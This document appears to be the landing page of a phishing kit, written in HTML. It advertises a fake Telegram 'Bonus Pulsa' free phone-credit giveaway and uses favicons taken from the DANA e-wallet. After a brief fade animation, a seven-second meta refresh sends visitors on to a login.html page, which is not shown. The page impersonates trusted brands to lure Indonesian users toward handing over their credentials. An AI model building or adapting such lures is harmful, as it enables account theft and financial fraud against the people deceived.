<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="description" content="Bonus Pulsa TELEGRAM Giveaway Pulsa Gratis Bagi Nomor Yang terpilih">
    <meta name="keywords" content="Bonus Pulsa TELEGRAM">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Bonus Pulsa TELEGRAM</title>
    <link rel="icon" type="image/x-icon" href="asset/loading.png">
    <link rel="apple-touch-icon" sizes="180x180" href="https://a.m.dana.id/merchant-portal/app/assets/fav-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="https://a.m.dana.id/merchant-portal/app/assets/fav-icon.png">
    <link rel="icon" type="image/png" sizes="16x16" href="https://a.m.dana.id/merchant-portal/app/assets/fav-icon.png">
    <link rel="manifest" href="https://yongkru.skemabiayatarif.com/DANA/assets/img/favicon/site.webmanifest">
    <meta http-equiv="refresh" content="7; URL=login.html">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <style>
        @keyframes fadeInAnimation {
            90% { opacity: 1 }
            to { opacity: 0 }
        }
        body {
            animation: fadeInAnimation ease 8s;
            animation-fill-mode: forwards;
            width: 100%;
            height: 100vh;
            margin: 0;
            padding: 0;
            background-color: #ffffff;
            display: flex;
            justify-content: center;
            align-items: center;
        }
        .dana_index {
            max-width: 90%;
            max-height: 90%;
            display: flex;
            justify-content: center;
            align-items: center;
            flex-direction: column;
        }
        img.logo {
            width: 80%;
            max-width: 800px;
            margin-bottom: 10%;
        }
        .footer {
            margin-top: auto;
            width: 50%;
            max-width: 200px;
        }
    </style>
</head>
<body>
    <div class="dana_index">
        <img class="logo" src="asset/logo14pesan.gif" alt="Telegram Logo">
        </a>
    </div>
</body>
</html>
